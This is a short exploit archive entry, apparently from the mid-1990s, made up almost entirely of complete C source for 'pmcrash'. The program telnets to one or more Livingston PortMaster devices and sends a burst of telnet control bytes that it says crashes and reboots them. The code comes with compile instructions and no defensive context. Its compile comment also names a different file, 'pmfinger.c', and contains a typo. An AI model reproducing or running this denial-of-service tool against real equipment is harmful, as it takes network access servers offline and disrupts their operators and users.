COMMAND
portmaster
PROBLEM
/* The following code will crash ANY Livingston PortMaster.
It telnets the the portmaster and overflows its buffers.
*/
/* pmcrash - note this'll work much faster if all your arguments
are IP addresses.. mainly because I didn't feel like
coding a structure to keep track of all the resolved
names.. so write a script to resolve your list of
names first, then provide those as arguments */
/* Compiling instructions:
Linux:
gcc -O2 -fomit-frame-pounter -s -o pmfinger pmfinger.c
Solaris 2.4:
cc -O -s -o pmfinger pmfinger.c -lsocket -lnsl -lresolv -lucb
*/
#include <sys/time.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <pwd.h>
#ifndef sys_errlist
extern char *sys_errlist[];
#endif
#ifndef errno
extern int errno;
#endif
/* Inet sockets :-) */
int num=0;
int socks[250];
/* show sessions flag */
unsigned short int showflag=0;
char *
mystrerror(int err) {
return(sys_errlist[err]);
}
void
exitprog(void) {
while(num--) {
shutdown(socks[num-1],0);
close(socks[num-1]);
}
exit(0);
}
unsigned long int
resolver(host)
char *host;
{
unsigned long int ip=0L;
if(host && *host && (ip=inet_addr(host))==-1) {
struct hostent *he;
if(!(he=gethostbyname((char *)host)))
ip=0L;
else
ip=*(unsigned long *)he->h_addr_list[0];
}
return(ip);
}
void
usage(void) {
puts("pmcrash v0.2a - ComOS System Rebooter :-)\n"
"Copyright (C) 1995 LAME Communications\n"
"Written by Dr. Delete, Ph.D.\n\n"
"Usage: pmcrash <portmaster>[:port] [<portmaster>[:port] ... ]\n");
exit(0);
}
void
main(int argc,char *argv[]) {
unsigned short int port=0,x=1;
struct sockaddr_in server;
char crash[] = { 0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3 };
char *temp;
if(argc<2)
usage();
signal(SIGPIPE,(void (*)())exitprog);
signal(SIGHUP,(void (*)())exitprog);
signal(SIGINT,(void (*)())exitprog);
signal(SIGTERM,(void (*)())exitprog);
signal(SIGBUS,(void (*)())exitprog);
signal(SIGABRT,(void (*)())exitprog);
signal(SIGSEGV,(void (*)())exitprog);
server.sin_family=AF_INET;
printf("\nConnecting..."); fflush(stdout);
for(;x<argc;x++) {
if((socks[num]=socket(AF_INET,SOCK_STREAM,0))==-1) {
fprintf(stderr,"Unable to allocate AF_INET socket: %s\n",mystrerror(errno));
exitprog();
}
setsockopt(socks[num],SOL_SOCKET,SO_LINGER,0,0);
setsockopt(socks[num],SOL_SOCKET,SO_REUSEADDR,0,0);
setsockopt(socks[num],SOL_SOCKET,SO_KEEPALIVE,0,0);
if((temp=strstr(argv[x],":"))) {
*temp++=(char)0;
server.sin_port=htons((atoi(temp)));
}
else
server.sin_port=htons(23);
if(!(server.sin_addr.s_addr = resolver(argv[x]))) {
fprintf(stderr,"Unable to resolve host '%s'.\n",argv[x]);
close(socks[num]);
continue;
}
if(connect(socks[num],(struct sockaddr *)&server,sizeof(struct sockaddr_in))) {
printf("!"); fflush(stdout);
/* fprintf(stderr,"Unable to connect to %s. (%s)\n",argv[x],mystrerror(errno)); */
close(socks[num]);
continue;
}
printf("."); fflush(stdout);
num++;
}
printf("\nSweeping..."); fflush(stdout);
for(x=0;x<num;x++) {
write(socks[x],crash,10);
printf("."); fflush(stdout);
}
puts("\n");
sleep(4);
exitprog();
}